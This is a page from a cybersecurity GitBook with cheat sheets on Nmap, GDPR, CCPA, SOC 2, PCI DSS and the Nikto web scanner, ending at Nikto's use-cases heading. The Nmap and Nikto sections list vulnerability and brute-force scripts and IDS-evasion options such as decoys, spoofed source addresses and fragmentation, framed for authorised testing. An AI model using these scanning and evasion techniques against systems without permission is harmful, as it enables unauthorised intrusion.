Only this pageAll pages
Powered by GitBook
1 of 40

Cybersecurity

Loading...

GRC Cheat Sheets

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Open Source Cheat Sheets

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Free Cyber TOOLS

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Community

Loading...

Loading...

Loading...

Loading...

Loading...

Nmap

Comprehensive Nmap Guide & Cheat Sheet

Nmap (Network Mapper) is a powerful, open-source tool for network discovery, security auditing, and vulnerability assessment. It is widely used by network administrators, penetration testers, and security professionals to map networks, discover hosts and services, and identify vulnerabilities.


1. What is Nmap?

Nmap is a command-line tool designed for network reconnaissance. It sends packets to target hosts and analyzes responses to determine which hosts are up, what services they offer, what operating systems they run, and more. Over its 25+ year history, Nmap has evolved from a simple port scanner to a comprehensive network security tool with advanced scripting capabilities .


2. Real-World Use Cases

  • Network Discovery & Inventory: Identify devices, services, and operating systems on a network.

  • Port Scanning: Detect open, closed, and filtered ports to assess potential entry points.

  • Vulnerability Scanning: Use scripts to find known vulnerabilities in services and configurations.

  • Security Auditing & Compliance: Ensure only authorized devices and services are present.

  • Penetration Testing: Simulate attacks to identify and fix vulnerabilities.

  • Firewall Testing: Evaluate firewall rules and responses to simulated attacks.

  • Network Security Monitoring: Detect changes in network topology or services .


3. Common Nmap Scan Types & Syntax

Scan Type
Description
Command Syntax

TCP SYN (Stealth) Scan

Default, stealthy, half-open scan

nmap -sS <target>

TCP Connect Scan

Full TCP handshake, less stealthy

nmap -sT <target>

UDP Scan

Scans UDP ports

nmap -sU <target>

SCTP INIT Scan

For SCTP protocol (telecom networks)

nmap -sY <target>

TCP NULL/FIN/Xmas Scans

Stealth scans using unusual TCP flags

nmap -sN/-sF/-sX <target>

ACK Scan

Maps firewall rules, not port state

nmap -sA <target>

Idle Scan

Stealthy, uses a third-party host

nmap -sI <zombie> <target>

Version Detection

Detects service versions

nmap -sV <target>

OS Detection

Identifies target OS

nmap -O <target>

Ping Scan

Host discovery only, no port scan

nmap -sn <target>

List Scan

Lists targets, no packets sent

nmap -sL <target>


4. Essential Nmap Switches, Flags, and Options

Host Discovery

  • -sn : Ping scan (host discovery only)

  • -Pn : Treat all hosts as online (skip host discovery)

  • -PS/PA/PU/PR : TCP SYN/ACK, UDP, ARP discovery on specified ports

Port Specification

  • -p <ports> : Specify ports (e.g., -p 80,443 or -p 1-65535)

  • -F : Fast scan (fewer ports)

  • --top-ports <n> : Scan top n most common ports

Service & Version Detection

  • -sV : Detect service versions

  • --version-intensity <0-9> : Set version detection intensity

OS Detection

  • -O : Enable OS detection

  • --osscan-limit : Limit OS detection to hosts with open ports

  • --osscan-guess : Aggressive OS guessing

Timing & Performance

  • -T0 to -T5 : Timing templates (T0=slowest/stealthiest, T5=fastest)

  • --min-rate/--max-rate : Control packet sending rate

Output Formats

  • -oN <file> : Normal output

  • -oX <file> : XML output

  • -oG <file> : Grepable output

  • -oA <basename> : All formats at once

Firewall/IDS Evasion

  • -f : Fragment packets

  • -D <decoy1,decoy2,...> : Use decoys

  • -S <IP> : Spoof source address

  • -g <port> : Use given source port

Nmap Scripting Engine (NSE)

  • -sC : Run default scripts

  • --script <name/category> : Run specific scripts (e.g., --script=http-enum)

  • --script-args <args> : Pass arguments to scripts


5. Nmap Scripting Engine (NSE)

NSE allows automation and advanced scanning using scripts written in Lua. Scripts are grouped by categories such as discovery, brute force, vulnerability, and exploitation.

Popular Scripts:

  • http-enum : Enumerate web server directories/files

  • smb-os-discovery : Identify OS via SMB

  • dns-brute : Brute-force DNS subdomains

  • ftp-anon : Check for anonymous FTP access

  • vulners : Detect known vulnerabilities

  • snmp-brute : Brute-force SNMP community strings

  • http-vuln-* : Detect web application vulnerabilities

Usage Example:

nmap --script=http-enum <target>
nmap --script=vulners -p 80,443 <target>

Script Help:

nmap --script-help=<scriptname>

Script Arguments:

nmap --script=<script> --script-args=<args> <target>

Best Practices: Only run scripts you understand, especially those in intrusive, exploit, or vuln categories, as they may disrupt services .


6. Timing Options

  • -T0 : Paranoid (very slow, stealthy)

  • -T1 : Sneaky

  • -T2 : Polite

  • -T3 : Normal (default)

  • -T4 : Aggressive (faster, less stealthy)

  • -T5 : Insane (fastest, most detectable)

Other Timing Controls:

  • --host-timeout <time> : Max time per host

  • --scan-delay <time> : Delay between probes


7. Output Formats

  • Normal: -oN <file>

  • XML: -oX <file>

  • Grepable: -oG <file>

  • All at once: -oA <basename>

  • Script Kiddie: -oS <file> (fun, not practical)


8. Best Practices & Security Considerations

  • Always obtain explicit permission before scanning any network you do not own or control. Unauthorized scanning is illegal and unethical .

  • Define clear objectives and scope for your scans.

  • Communicate with stakeholders to avoid disruptions.

  • Document and analyze scan results for future reference.

  • Be aware of network impact: Aggressive scans can disrupt services.

  • Understand legal and ethical constraints: Unauthorized use can result in legal action .

  • Use NSE scripts responsibly: Some scripts can be intrusive or disruptive .


9. Limitations

  • Detection by IDS/IPS: Even stealth scans can be detected by modern security systems.

  • Network Impact: Large or aggressive scans may slow down or disrupt networks.

  • Legal Risks: Unauthorized scanning can lead to lawsuits or criminal charges.

  • Not a Vulnerability Scanner: Nmap can identify potential vulnerabilities, but is not a full vulnerability management solution .


10. Quick Reference Cheat Sheet

# Basic host discovery (ping scan)
nmap -sn 192.168.1.0/24

# Stealth SYN scan of top 1000 ports
nmap -sS <target>

# Full TCP connect scan of all ports
nmap -sT -p 1-65535 <target>

# UDP scan of top 100 ports
nmap -sU --top-ports 100 <target>

# Service and version detection
nmap -sV <target>

# OS detection
nmap -O <target>

# Run default scripts
nmap -sC <target>

# Run specific NSE script
nmap --script=http-enum <target>

# Aggressive scan (OS, version, script, traceroute)
nmap -A <target>

# Output in all formats
nmap -oA scan_results <target>

11. Further Resources

  • Nmap Official Documentation

  • Nmap Cheat Sheet (PDF)

  • Nmap Scripting Engine Docs


12. Summary Table: Common Nmap Options

Option
Description

-sS

TCP SYN (stealth) scan

-sT

TCP connect scan

-sU

UDP scan

-p

Specify ports

-F

Fast scan

-A

Aggressive scan (OS, version, scripts)

-O

OS detection

-sV

Service/version detection

-T0--T5

Timing templates

-oN/-oX/-oG/-oA

Output formats

-sC

Default scripts

--script

Specify NSE scripts

-D

Decoy scan

-f

Fragment packets

-Pn

Treat all hosts as online


13. Final Notes

Nmap is a versatile and indispensable tool for network security. Mastery of its options, scan types, and scripting capabilities can greatly enhance your ability to assess and secure networks. Always use Nmap responsibly, ethically, and legally.


GDPR

Comprehensive GDPR Summary Guide & Cheat Sheet

The General Data Protection Regulation (GDPR) is the European Union’s landmark data privacy law, designed to protect the personal data and privacy of individuals within the EU and the European Economic Area (EEA). It also addresses the export of personal data outside the EU and EEA. Below is a comprehensive guide and cheat sheet covering the core aspects of GDPR compliance.


1. Fundamental Principles of GDPR

GDPR is built on seven core principles that must guide all personal data processing activities:

  1. Lawfulness, Fairness, and Transparency: Data must be processed lawfully, fairly, and in a transparent manner .

  2. Purpose Limitation: Data should be collected for specified, explicit, and legitimate purposes and not further processed in a way incompatible with those purposes .

  3. Data Minimisation: Only collect data that is adequate, relevant, and necessary for the intended purpose .

  4. Accuracy: Ensure personal data is accurate and kept up to date; rectify or erase inaccurate data promptly .

  5. Storage Limitation: Do not keep data longer than necessary for the purposes for which it was collected .

  6. Integrity and Confidentiality: Process data securely, protecting against unauthorized or unlawful processing, loss, destruction, or damage .

  7. Accountability: Be able to demonstrate compliance with all GDPR principles .


2. Scope and Key Definitions

  • Territorial Scope: Applies to all organizations processing personal data of individuals in the EU, regardless of the organization’s location. Also applies to organizations outside the EU if they offer goods/services to or monitor the behavior of EU residents .

  • Personal Data: Any information relating to an identified or identifiable natural person (data subject), e.g., names, emails, IP addresses .

  • Processing: Any operation performed on personal data (collection, storage, use, erasure, etc.).

  • Controller: Entity that determines the purposes and means of processing personal data .

  • Processor: Entity that processes data on behalf of the controller.

  • Consent: Freely given, specific, informed, and unambiguous indication of the data subject’s wishes .


3. Data Subject Rights

GDPR grants individuals (data subjects) several rights regarding their personal data:

  1. Right to be Informed: About data collection and use .

  2. Right of Access: To their personal data and supplementary information .

  3. Right to Rectification: To correct inaccurate or incomplete data .

  4. Right to Erasure ("Right to be Forgotten"): To have data deleted under certain circumstances .

  5. Right to Restrict Processing: To limit how data is used .

  6. Right to Data Portability: To receive data in a structured, commonly used, machine-readable format .

  7. Right to Object: To certain types of processing, such as direct marketing .

  8. Rights Related to Automated Decision Making and Profiling: Not to be subject to decisions based solely on automated processing .

  9. Right to Withdraw Consent: At any time, as easily as it was given .

  10. Right to Complain: To a supervisory authority if rights are violated .


4. Consent Requirements

  • Must be freely given, specific, informed, and unambiguous .

  • Must be given by a clear affirmative action (no pre-ticked boxes or silence).

  • Must be as easy to withdraw as to give .

  • Organizations must be able to demonstrate that valid consent was obtained .


5. Organizational Obligations

  • Data Protection by Design and by Default: Integrate data protection into processing activities and business practices from the outset .

  • Accountability: Maintain records of processing activities and implement appropriate technical and organizational measures .

  • Data Breach Notification: Notify the relevant supervisory authority within 72 hours of becoming aware of a breach, unless unlikely to result in risk to individuals .

  • Training and Awareness: Regularly train staff on data protection and GDPR compliance .


6. Data Protection Officer (DPO) Requirements

  • When Required: Must appoint a DPO if you are a public authority, engage in large-scale systematic monitoring, or process large-scale special categories of data .

  • Role: Advise on data protection, monitor compliance, serve as contact for data subjects and authorities, and conduct training .

  • Independence: Must operate independently and report to the highest management level .


7. Documentation and Record-Keeping

  • Records of Processing Activities: Document purposes, categories of data, data subjects, recipients, and data transfers .

  • Data Protection Impact Assessments (DPIAs): Required for high-risk processing activities.

  • Policies and Procedures: Maintain up-to-date data protection policies, breach response plans, and retention schedules .


8. Security Measures

  • Technical and Organizational Measures: Implement appropriate security (e.g., encryption, pseudonymization, access controls) .

  • Regular Testing: Assess and evaluate the effectiveness of security measures regularly.

  • Data Protection by Design and Default: Integrate security into systems and processes from the start .


9. Data Breach Notification

  • Supervisory Authority: Notify within 72 hours of becoming aware of a breach .

  • Data Subjects: Notify affected individuals if the breach is likely to result in a high risk to their rights and freedoms .

  • Documentation: Record all breaches, including facts, effects, and remedial actions .


10. International Data Transfers

  • Adequacy Decisions: Data can be transferred to countries deemed by the EU to provide adequate protection .

  • Appropriate Safeguards: Use Standard Contractual Clauses (SCCs), Binding Corporate Rules (BCRs), or other mechanisms if no adequacy decision exists .

  • Derogations: In specific cases, such as explicit consent, data can be transferred without adequacy or safeguards .

  • Transfer Impact Assessments: Assess the legal environment of the recipient country and implement additional safeguards if necessary .


11. Enforcement and Fines

  • Fines: Up to €20 million or 4% of annual global turnover, whichever is higher, for serious infringements.

  • Notable Fines:

    • Meta (Facebook): €1.2 billion for unlawful data transfers .

    • Amazon: €746 million for consent violations .

    • TikTok: €345 million for children’s data processing issues .

    • WhatsApp: €225 million for transparency failures .

  • Trends: Fines are increasing, especially for repeated or large-scale violations, and focus on international transfers, consent, and transparency .


12. GDPR Compliance Checklist (Cheat Sheet)

Area
Key Actions

13. Key Takeaways

  • GDPR applies globally to any organization processing EU residents’ data.

  • Data subject rights and consent are central to compliance.

  • Security, transparency, and accountability are non-negotiable.

  • Non-compliance can result in severe financial and reputational consequences.

  • Regular training, documentation, and audits are essential for ongoing compliance.


This guide provides a comprehensive overview and actionable cheat sheet for GDPR compliance. For detailed implementation, always consult the full text of the GDPR and seek legal advice where necessary.

Awareness & Training

Train staff, raise awareness, appoint DPO if required

Data Inventory & Mapping

Document what data you collect, where it goes, and why

Consent Management

Review and update consent mechanisms, keep records

Data Subject Rights

Set up processes to handle access, rectification, erasure, and other rights

Security Measures

Implement encryption, access controls, regular security reviews

Data Breach Response

Establish breach detection, notification, and documentation procedures

International Transfers

Assess adequacy, use SCCs/BCRs, conduct transfer impact assessments

Documentation

Maintain records of processing, DPIAs, policies, and procedures

Regular Audits

Conduct periodic reviews and audits of data protection practices

CCPA

CCPA Comprehensive Guide & Cheat Sheet

The California Consumer Privacy Act (CCPA) is a landmark data privacy law that grants California residents significant rights over their personal information and imposes strict obligations on businesses. This guide provides a thorough summary and practical cheat sheet for understanding, complying with, and implementing the CCPA, including recent amendments and best practices.


1. Fundamental Framework, Scope, and Applicability

What is the CCPA?

  • Enacted in 2018, effective January 1, 2020, the CCPA enhances privacy rights and consumer protection for California residents .

  • Amended by the California Privacy Rights Act (CPRA), effective January 1, 2023, which expanded consumer rights and established the California Privacy Protection Agency (CPPA) .

Who Must Comply?

The CCPA applies to for-profit businesses that do business in California and meet any of the following thresholds:

  • Gross Annual Revenue: Over $26.625 million (as of January 1, 2025; previously $25 million) .

  • Data Transactions: Buy, sell, or share the personal information of 100,000 or more California residents, households, or devices annually .

  • Revenue from Data: Derive 50% or more of annual revenue from selling or sharing personal information .

Note: The law applies to businesses outside California if they meet these thresholds and handle California residents’ data .


2. Key Definitions

  • Consumer: A natural person who is a California resident .

  • Business: A for-profit entity that collects consumers’ personal information, determines the purposes and means of processing, and meets the applicability thresholds .

  • Personal Information: Information that identifies, relates to, describes, or could reasonably be linked with a particular consumer or household.

  • Sensitive Personal Information: Includes government IDs, financial data, geolocation, racial/ethnic origin, health data, and, as of August 2024, neural data .


3. Consumer Rights Under the CCPA

Right
Description
Business Obligation

Right to Know/Access

Know what personal info is collected, sources, purposes, and third parties shared with

Provide this info upon request within 45 days; update privacy policy accordingly

Right to Delete

Request deletion of personal info held by the business

Delete info and instruct service providers to do the same, unless an exception applies

Right to Opt-Out

Opt out of the sale of personal info

Provide a “Do Not Sell My Personal Information” link; honor opt-out requests for at least 12 months

Right to Correct

Request correction of inaccurate personal info (added by CPRA)

Correct inaccurate info upon request

Right to Limit

Limit use/disclosure of sensitive personal info

Provide a “Limit the Use of My Sensitive Personal Information” link

Right to Non-Discrimination

No discrimination for exercising CCPA rights

Cannot deny goods/services, charge different prices, or provide different quality of service


4. Business Compliance Requirements & Best Practices

Core Obligations

  • Transparency: Provide clear, conspicuous notices about data collection, use, and sharing .

  • Privacy Policy: Update at least every 12 months; must detail consumer rights and how to exercise them .

  • Opt-Out Mechanism: Prominently display “Do Not Sell My Personal Information” and “Limit the Use of My Sensitive Personal Information” links .

  • Consumer Request Handling: Offer at least two methods for submitting requests (e.g., toll-free number, web form) .

  • Verification: Verify consumer identity before fulfilling requests .

  • Timely Response: Respond to requests within 45 days (with a possible 45-day extension) .

  • Data Security: Implement reasonable security measures (encryption, access controls, regular audits) .

  • Employee Training: Train staff on CCPA requirements and consumer request handling .

  • Third-Party Management: Update contracts to ensure vendors comply with CCPA .

  • Record Keeping: Maintain records of consumer requests and responses for at least 24 months .

Practical Implementation Steps

  1. Conduct a Data Inventory: Map all personal data collected, processed, and shared .

  2. Update Privacy Policies and Notices: Ensure clarity and compliance with CCPA requirements .

  3. Implement Consumer Rights Protocols: Streamline processes for handling access, deletion, correction, and opt-out requests .

  4. Provide Opt-Out and Limitation Links: Make these links easy to find and use; recognize global opt-out signals .

  5. Enhance Data Security: Use encryption, access controls, and regular security assessments.

  6. Audit Third-Party Agreements: Ensure all vendors and partners are CCPA-compliant .

  7. Regularly Review Compliance: Stay updated on amendments and adjust practices as needed.


5. Recent Amendments and Updates (2023–2025)

  • CPRA Amendments: Effective January 1, 2023, expanded consumer rights and established the CPPA .

  • 2024 Amendments: Six new amendments passed, including expanded definitions (e.g., neural data as sensitive personal info) and additional protections for reproductive healthcare and citizenship data .

  • 2025 Updates: New regulations on automated decision-making, cybersecurity audits, and risk assessments; increased penalties and new obligations for businesses .

  • Delayed Enforcement: CPPA won an appeal in February 2024, delaying enforcement of updated regulations by one year .


6. Enforcement Mechanisms and Penalties

  • Regulatory Bodies: California Attorney General and California Privacy Protection Agency (CPPA) .

  • Cure Period: 30-day period to fix violations after notification (may not apply to all violations post-CPRA) .

  • Private Right of Action: Consumers can sue for certain data breaches .

  • Penalties:

    • Up to $2,500 per unintentional violation

    • Up to $7,500 per intentional violation

    • No cap on total fines; penalties can accumulate

  • Additional Costs: Injunctions, reputational damage, and civil lawsuit costs.

Notable Enforcement Cases

  • Sephora (2022): $1.2 million fine for failing to disclose data sales and not honoring global opt-out signals .

  • Todd Snyder, Inc.: $345,178 fine for improper opt-out mechanisms and excessive data collection.

  • Honda (2025): $632,500 fine for difficult opt-out process and excessive info requests .

  • DoorDash (2024): $375,000 fine for sharing user data with marketing partners without proper notice .


7. CCPA Cheat Sheet

Area
Key Points

Who Must Comply?

For-profit businesses in CA or serving CA residents, meeting revenue/data thresholds

Consumer Rights

Know, Delete, Opt-Out, Correct, Limit, Non-Discrimination

Privacy Policy

Must be clear, updated annually, and detail rights/processes

Opt-Out Links

“Do Not Sell My Personal Information” and “Limit the Use of My Sensitive Personal Information”

Request Handling

At least two methods; respond in 45 days; verify identity

Data Security

Reasonable measures (encryption, access controls, audits)

Employee Training

Required for all staff handling consumer data

Third-Party Contracts

Must ensure CCPA compliance

Penalties

$2,500–$7,500 per violation; no cap; private right of action for breaches

Recent Changes

CPRA amendments, new sensitive data categories, increased penalties, new regulations (2023–2025)


8. Resources and Ongoing Compliance

  • Stay Informed: Regularly monitor updates from the California Privacy Protection Agency and Attorney General.

  • Review Practices: Conduct annual reviews of privacy policies, data inventories, and compliance protocols.

  • Document Everything: Keep detailed records of compliance efforts, consumer requests, and responses.


9. Summary Table: CCPA vs. CPRA (Key Additions)

Feature/Right
CCPA (2020)
CPRA (2023+) Additions/Changes

Right to Correct

No

Yes

Right to Limit Sensitive Info

No

Yes

Sensitive Info Definition

Basic

Expanded (e.g., neural data, health, etc.)

Enforcement Agency

Attorney General

CPPA (new agency)

Automated Decision-Making

Not addressed

New regulations in 2025

Risk Assessments

Not required

Required for certain businesses


10. Quick Reference: CCPA Compliance Checklist


SOC II TYPE II

SOC 2 Type II: Comprehensive Summary & Cheat Sheet


What is SOC 2 Type II?

SOC 2 Type II is an independent attestation report that evaluates how effectively an organization’s controls related to information security, availability, processing integrity, confidentiality, and privacy operate over a defined period (typically 6–12 months). It is based on the American Institute of Certified Public Accountants (AICPA) Trust Services Criteria (TSC) and is especially relevant for service organizations that handle sensitive or customer data .


Purpose & Importance

  • Purpose: To provide assurance to clients and stakeholders that an organization has robust, effective controls in place to protect data and systems over time.

  • Importance:

    • Demonstrates a commitment to security and compliance.

    • Enhances trust and credibility with customers and partners.

    • Helps meet regulatory requirements (e.g., GDPR, HIPAA, PCI DSS).

    • Provides a competitive advantage in industries where data protection is critical .


Key Differences: SOC 2 Type I vs. Type II

Feature
SOC 2 Type I
SOC 2 Type II

Scope

Design of controls

Design & operational effectiveness

Testing Period

Single point in time

Over a period (3–12 months)

Assurance Level

Limited (design only)

High (design + operation)

Use Case

Quick demonstration of controls

Ongoing, sustained compliance

Report Content

Auditor’s opinion on design

Auditor’s opinion + effectiveness

Cost/Time

Lower/Shorter

Higher/Longer


The Five Trust Services Criteria (TSC)

  1. Security (Common Criteria)

    • Protection against unauthorized access, disclosure, and damage.

    • Controls: Firewalls, access controls, encryption, monitoring .

  2. Availability

    • Systems are operational and accessible as needed.

    • Controls: Performance monitoring, disaster recovery, incident response .

  3. Processing Integrity

    • System processing is complete, valid, accurate, timely, and authorized.

    • Controls: Data validation, error detection, monitoring .

  4. Confidentiality

    • Information designated as confidential is protected.

    • Controls: Encryption, access restrictions, secure transmission .

  5. Privacy

    • Personal information is collected, used, retained, disclosed, and disposed of in accordance with privacy policies and regulations.

    • Controls: Consent management, data protection, user access .


SOC 2 Type II Audit Process

  1. Define Scope

    • Identify systems, processes, and data to be audited.

    • Select relevant TSCs .

  2. Risk Assessment

    • Identify vulnerabilities and threats.

    • Develop mitigation strategies .

  3. Establish Controls

    • Implement policies, procedures, and technical controls.

    • Ensure controls align with selected TSCs .

  4. Readiness Assessment

    • Conduct a mock audit to identify gaps.

    • Address deficiencies before the official audit .

  5. Select Auditor

    • Choose a qualified CPA firm experienced in SOC 2 audits.

  6. Audit Period

    • Controls are tested for operational effectiveness over 3–12 months .

  7. Evidence Collection

    • Provide documentation: policies, logs, incident reports, training records, etc. .

  8. Reporting

    • Auditor issues a detailed report with findings and recommendations.


Documentation Requirements

  • Process Flows: Diagrams and descriptions of workflows.

  • Policies & Procedures: Security, privacy, incident response, data handling.

  • Evidence of Controls: Access logs, audit trails, encryption protocols, monitoring reports.

  • Training Records: Proof of employee training on security and compliance .


Common Compliance Challenges

  • Navigating complex and evolving regulations.

  • Ensuring third-party/vendor compliance.

  • Maintaining up-to-date documentation.

  • Training and awareness for all staff.

  • Continuous monitoring and improvement of controls .


Best Practices & Preparation Strategies

  • Risk-Based Approach: Regularly assess and prioritize risks .

  • Strong Internal Controls: Segregation of duties, automated workflows, continuous monitoring.

  • Continuous Monitoring: Regular internal audits and compliance checks.

  • Employee Training: Ongoing, role-specific training programs .

  • Leverage Technology: Use compliance management tools for automation and tracking .

  • Stakeholder Engagement: Involve all levels of the organization in compliance efforts.

  • Readiness Assessments: Conduct mock audits to identify and address gaps before the official audit .


Real-World Examples

  • Center for Internet Security (CIS): Completed a SOC 2 Type II audit to protect member data and meet compliance requirements .

  • ManagingLife: Embedded security and privacy into their business model to achieve SOC 2 compliance .

  • Shutlingsloe Ltd: Underwent a readiness assessment to prepare for SOC 2 Type II, highlighting the importance of preparation and gap analysis .


Quick Reference Cheat Sheet

Step/Area
Key Points

Purpose

Prove controls are effective over time; build trust

Scope

Security, Availability, Processing Integrity, Confidentiality, Privacy

Audit Period

3–12 months (controls tested over time)

Documentation

Policies, procedures, logs, evidence of controls, training records

Best Practices

Risk assessment, readiness assessment, continuous monitoring, training

Challenges

Regulatory complexity, third-party risk, documentation, training

Type I vs. Type II

Type I: Design at a point in time; Type II: Design + operation over time

Outcome

Detailed report for clients/stakeholders; recommendations for improvement


Summary

SOC 2 Type II is a rigorous, time-bound audit that demonstrates an organization’s ability to maintain effective controls for information security and privacy. It is essential for organizations handling sensitive data, providing a high level of assurance to clients and partners, and is a key differentiator in competitive markets. Preparation, documentation, and continuous improvement are critical to successful compliance .


Use this summary and cheat sheet as a foundation for understanding, preparing for, and maintaining SOC 2 Type II compliance.

PCI DSS

PCI DSS Comprehensive Summary & Cheat Sheet

What is PCI DSS?

The Payment Card Industry Data Security Standard (PCI DSS) is a globally recognized set of security standards designed to ensure that all organizations that accept, process, store, or transmit credit card information maintain a secure environment. It was first launched in 2006 and is maintained by the PCI Security Standards Council (PCI SSC) .


Evolution and Latest Version

  • Initial Release: 2006

  • Current Version: PCI DSS v4.0 (released March 31, 2022)

  • Key Milestones:

    • PCI DSS v3.2.1 retired on March 31, 2024

    • PCI DSS v4.0 is now the only active version

    • Some new requirements in v4.0 become mandatory on March 31, 2025

Key Drivers for v4.0:

  • Adapting to new technologies (cloud, contactless payments)

  • Addressing evolving cyber threats

  • Incorporating industry feedback (over 6,000 pieces of input from 200+ organizations)

Major Changes in v4.0:

  • Introduction of a "customized approach" for meeting requirements

  • Stricter multi-factor authentication and password policies

  • New requirements for phishing and e-skimming

  • Enhanced reporting and validation methods


The 12 Core PCI DSS Requirements

  1. Install and maintain a firewall configuration to protect cardholder data

  2. Do not use vendor-supplied defaults for system passwords and other security parameters

  3. Protect stored cardholder data

  4. Encrypt transmission of cardholder data across open, public networks

  5. Protect all systems against malware and regularly update anti-virus software or programs

  6. Develop and maintain secure systems and applications

  7. Restrict access to cardholder data by business need to know

  8. Identify and authenticate access to system components

  9. Restrict physical access to cardholder data

  10. Track and monitor all access to network resources and cardholder data

  11. Regularly test security systems and processes

  12. Maintain a policy that addresses information security for all personnel

Each requirement contains detailed sub-requirements specifying the exact controls and measures needed for compliance.


Compliance Levels

PCI DSS compliance is divided into four levels based on the volume of card transactions processed annually:

  • Level 1: >6 million transactions/year

  • Level 2: 1–6 million transactions/year

  • Level 3: 20,000–1 million transactions/year

  • Level 4: <20,000 transactions/year

All levels must meet the 12 core requirements, but the assessment and validation process varies by level .


Assessment & Validation

Assessment Procedures:

  • Self-Assessment Questionnaire (SAQ): For smaller merchants or those with lower risk profiles

  • Report on Compliance (ROC): For larger merchants or those required to have an on-site assessment by a Qualified Security Assessor (QSA)

  • Vulnerability Scanning & Penetration Testing: Required regularly (at least quarterly for scans)

  • Annual or Quarterly Reporting: Depending on card brand and merchant level


Implementation Guidelines & Best Practices

  • Use Implementation Frameworks: Organize and structure compliance efforts using established frameworks .

  • Integrate Compliance into Business Processes: Embed PCI DSS requirements into contracts and daily operations.

  • Engage Stakeholders: Involve all relevant parties, including IT, management, and third-party vendors.

  • Iterative Feedback: Continuously monitor, test, and adapt security controls.

  • Resource Management: Prioritize strategies based on available resources and risk .

Common Challenges:

  • Complexity and non-linearity of requirements

  • Resource constraints (time, personnel, budget)

  • Maintaining stakeholder engagement

  • Ensuring clear specification and documentation of controls .


Tools, Resources, and Documentation

  • PCI Security Standards Council Document Library: Official standards, templates, and guidance .

  • PCI DSS v4.x Resource Hub: Latest documents and educational materials .

  • Compliance Toolkits: Pre-packaged resources to streamline compliance (e.g., PCI-DSS-Compliance-Toolkit) .

  • Cloud Provider Support: AWS and Azure offer PCI DSS compliance tools and documentation .

  • Qualified Security Assessors (QSAs): Certified professionals who can guide and validate compliance .


Real-World Case Studies

  • Retail Chains: Use enterprise-class log management to pass audits .

  • Fintechs (e.g., TransferGo): Achieved Level 1 compliance with reduced manpower using specialized tools .

  • Online Retailers: Overcame audit failures and achieved compliance through targeted remediation .

  • Service Providers: Implemented secure payment experiences and achieved compliance through tailored solutions .


PCI DSS v4.0 Transition Timeline

Date
Event/Requirement

March 31, 2022

PCI DSS v4.0 released

March 31, 2024

PCI DSS v3.2.1 retired; v4.0 is only active

March 31, 2025

Future-dated v4.0 requirements become mandatory


PCI DSS Cheat Sheet

Area
Key Points

Scope

Applies to all entities storing, processing, or transmitting cardholder data

12 Requirements

Firewall, no default passwords, protect data, encrypt, anti-malware, secure apps, restrict access, authenticate, physical security, logging, testing, security policy

Compliance Levels

1: >6M, 2: 1–6M, 3: 20K–1M, 4: <20K transactions/year

Assessment

SAQ (self), ROC (QSA), vulnerability scans, pen tests

Validation

Annual/quarterly reporting, varies by level and card brand

v4.0 Highlights

Customized approach, stricter MFA, new phishing/e-skimming controls

Best Practices

Integrate into processes, engage stakeholders, continuous improvement

Common Challenges

Complexity, resource constraints, stakeholder engagement

Resources

PCI SSC library, toolkits, cloud provider docs, QSAs

Transition Dates

v4.0 only after March 31, 2024; new reqs mandatory March 31, 2025


Final Notes

  • Continuous Compliance: PCI DSS is not a one-time project but an ongoing process of maintaining and improving security controls.

  • Documentation: Keep thorough records of all compliance activities, assessments, and remediation efforts.

  • Stay Updated: Regularly review PCI SSC updates and adapt to new requirements as they are published.

By following these guidelines and leveraging available resources, organizations can effectively achieve and maintain PCI DSS compliance, thereby protecting cardholder data and reducing the risk of data breaches .

Nikto

Alex Joseph

Nikto Comprehensive Guide & Cheat Sheet

Nikto is a widely used open-source web server scanner designed to identify vulnerabilities, misconfigurations, and security issues in web servers and web applications. This guide provides a thorough overview, including installation, usage, command-line options, best practices, troubleshooting, and more.


1. Background & Features

Nikto is a Perl-based tool that scans web servers for:

  • Over 6,700 potentially dangerous files/programs

  • Outdated versions of 1,250+ servers

  • Version-specific problems on 270+ servers

  • Server configuration issues (e.g., multiple index files, HTTP options)

  • SSL, proxy, and host authentication support

  • Customizable scans and plugin support

  • Integration with other security tools and extensive reporting/logging .

Technical Specs:

  • Runs on any platform with Perl (Linux, Windows, macOS)

  • Command-line interface

  • Built on LibWhisker2 .


2. Installation

Prerequisites

  • Perl (pre-installed on most Linux/macOS; install via Strawberry Perl on Windows)

  • Git (optional, for cloning the repository)

Installation Steps

Linux/macOS

git clone https://github.com/sullo/nikto.git
cd nikto/program
perl nikto.pl -H

Windows

  1. Install Strawberry Perl

  2. Download or clone Nikto as above

  3. Run via Command Prompt:

    perl nikto.pl -H

Note: Always update Nikto after installation:

perl nikto.pl -update

3. Command-Line Options Cheat Sheet

Option
Description
Example

-h <host>

Target host (IP, hostname, or URL)

-h example.com

-p <port>

Target port (default: 80)

-p 8080

-o <file>

Output file

-o results.txt

-Format <format>

Output format: txt, csv, html, xml

-Format html

-T <timeout>

Timeout for requests (seconds)

-T 10

-ssl

Force SSL (HTTPS)

-ssl

-Cgidirs <dirs>

CGI directories to scan (comma-separated)

-Cgidirs /cgi-bin/

-Plugins <plugin>

Specify plugins to use

-Plugins apache_expect_xss

-evasion <tech>

Use evasion techniques (anti-IDS)

-evasion 1

-Tuning <options>

Select test types (see below)

-Tuning 123

-useragent <string>

Set custom User-Agent

-useragent "Mozilla/5.0"

-useproxy

Use proxy (set in config)

-useproxy

-config <file>

Use alternate config file

-config /path/to/nikto.conf

-update

Update plugins and databases

-update

-list-plugins

List available plugins

-list-plugins

-Display <opts>

Control output verbosity (V, D, E, S, I, L, M, A)

-Display V

-Help or -H

Show help

-H

Tuning Options (for -Tuning):

  • 0: File Upload

  • 1: Interesting File / Seen in logs

  • 2: Misconfiguration / Default File

  • 3: Information Disclosure

  • 4: Injection (XSS, SQLi, etc.)

  • 5: Remote File Retrieval

  • 6: Denial of Service

  • 7: Remote File Execution

  • 8: Command Execution


4. Scanning Modes & Configuration

Scanning Modes

  • Standard Scan: Default, comprehensive scan for known vulnerabilities.

  • Tuning: Use -Tuning to focus on specific vulnerability types.

  • Evasion: Use -evasion to attempt bypassing IDS/IPS (not stealthy by default).

  • Custom Plugins: Use -Plugins to load specific vulnerability checks.

Configuration File (nikto.conf)

  • Set default options, proxy, user-agent, etc.

  • Example entries:

    PROXYHOST=127.0.0.1
    PROXYPORT=8080
    USERAGENT=Mozilla/5.0

5. Common Use Cases

